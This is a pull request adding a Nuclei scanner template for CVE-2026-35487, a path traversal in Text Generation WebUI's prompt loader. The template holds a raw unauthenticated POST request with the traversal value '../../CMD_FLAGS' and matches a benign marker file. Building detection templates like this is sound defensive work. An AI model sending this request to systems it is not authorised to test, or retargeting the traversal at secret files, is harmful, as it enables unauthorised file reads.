### PR TITLE
Add CVE-2026-35487 Nuclei template

### DIFF
--- a/http/cves/2026/CVE-2026-35487.yaml
+++ b/http/cves/2026/CVE-2026-35487.yaml
@@ -1,0 +1,55 @@
+id: CVE-2026-35487
+
+info:
+  name: oobabooga Text Generation WebUI < 4.3.3 - Path Traversal in Prompt Loader
+  author: str4k3r
+  severity: high
+  description: |
+    Text Generation WebUI before the v4.3.3 fix appends a user-controlled
+    prompt name directly to the notebook path. An unauthenticated Gradio
+    callback therefore reads a predictable file outside the notebook
+    directory. This template uses the benign, application-shipped
+    user_data/CMD_FLAGS.txt marker and does not request a system secret.
+
+    The vulnerable/fixed targets were built from the official
+    upstream v4.3.2 and v4.3.3 source tags because no official versioned OCI
+    images were available. The differential is real and reproducible, but the
+    artifact is publication-blocked until an official image boundary is
+    available and the upstream collision check remains clear.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-35487
+    - https://github.com/oobabooga/text-generation-webui
+    - https://github.com/oobabooga/textgen/wiki/09-%E2%80%90-Docker
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 8.2
+    cve-id: CVE-2026-35487
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 1
+    product: text-generation-webui
+    vendor: oobabooga
+  tags: cve,cve2026,path-traversal,file-read,textgen,unauth
+
+http:
+  - raw:
+      - |
+        POST /run/load_prompt HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"data":["{{prompt_name}}"]}
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "{{marker}}"
+
+variables:
+  prompt_name: "../../CMD_FLAGS"
+  marker: "# Add persistent flags here"


### PR DESCRIPTION
Adds a parameterized Nuclei template for CVE-2026-35487. Any required setup, seed, authentication, or callback values are exposed as scan-time variables; no forge-local target address is embedded. Native Nuclei validation passed, and the local ledger records the vulnerable/fixed differential as 3/3 detected versus 3/3 not detected.